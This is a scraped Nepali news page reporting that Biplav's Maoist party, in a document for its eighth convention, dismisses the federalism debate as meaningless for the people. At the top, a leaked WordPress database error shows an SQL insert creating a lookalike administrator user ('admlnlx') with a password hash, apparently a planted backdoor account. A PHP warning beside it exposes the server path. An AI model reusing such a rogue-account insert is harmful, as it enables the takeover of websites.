WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPfw1twTar2UEAUeKkVcdkxikAmR051', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:02:33', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
संघीयताको विरुद्धमा विप्लव माओवादी – Gaule Khabar

संघीयताको विरुद्धमा विप्लव माओवादी

संघीयताको विरुद्धमा विप्लव माओवादी

काठमाडौं, माघ ३ –

नेत्रविक्रम चन्द विप्लव नेतृत्वको नेकपा (माओवादी) नेपालमा अहिले प्रयोग हुन खोजिरहेको संघीयताको विपक्षमा देखिएको छ । उसले अहिलेको संघीयतासम्बन्धी बहसको जनताका लागि कुनै अर्थ नभएको पार्टी महाधिवेशनका लागि तयार पारेको राजनीतिक दस्ताबेजमा उल्लेख गरेको छ ।

आगामी १ देखि ७ फागुनसम्म हुन लागेको आठौं महाधिवेशनका लागि तयरा पारेको राजनीतिक दस्ताबेजमा विप्लवले संघीयताको बहस अर्थहीन रहेको उल्लेख गरेका छन् । केन्द्रीय समिति बैठकबाट अनुमोदन गरी पार्टीका क्षेत्रीय ब्युरोस्तरका नेताहरुका बीचमा अध्ययनका लागि वितरित दस्ताबेजमा त्यसको प्रस्ट व्याख्या गरिएको छ ।

‘नेपालमा केही शक्तिले गणतन्त्रमा संघीयता भयो भने जातीय मुक्ति हुन्छ त्यसैले केही भूगोल र अधिकार बाँडफाँट गरे पुग्छ भन्ने सोचाइ राख्ने गरेका छन् । कोही सत्ता एकात्मक भए पनि जनवादी भए पुग्छ भन्ने सोचाइ राख्ने गर्छन् । हाम्रो विचारमा यी दुवै दृष्टिकोण गलत छन्,’ विप्लवको दस्ताबेजमा भनिएको छ, ‘केही जिल्ला वा भूगोल थपघट भए पुग्छ भन्ने सोचाइ जनताका लागि उत्पीडनबाट मुक्तिको दृष्टिकोण होइन । काठमाडौंको दलाल पुँजीवादी सत्ताले शासन गर्नुका साटो मधेसको दलला पुँजीपति वर्गले शासन गर्न पाउनुपर्छ भने मात्र हुन्छ । यो जनताका लागि कुनै अर्थ छैन । यो त कालेको ठाउँमा गोरेले शासन गर्नेजस्तो मात्र हुन्छ ।’

उनले जनवादी गणतन्त्र वा वैज्ञानिक समाजवादभित्र उत्पीडित जातिको स्वशासनको सुनिश्चितता आवश्यक रहेको व्याख्या गरेका छन् । ‘स्वशासनसहितको नयाँ नजवाद र वैज्ञानिक समाजवादले मात्र वर्गीय र जातीय मुक्ति सुनिश्चित गर्न सक्छ र नेपाल वास्तविक जनताको नेपालमा रुपान्तरित हुनेछ,’ विप्लवले भनेका छन् । नयाँ पत्रिका दैनिकमा खबर छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका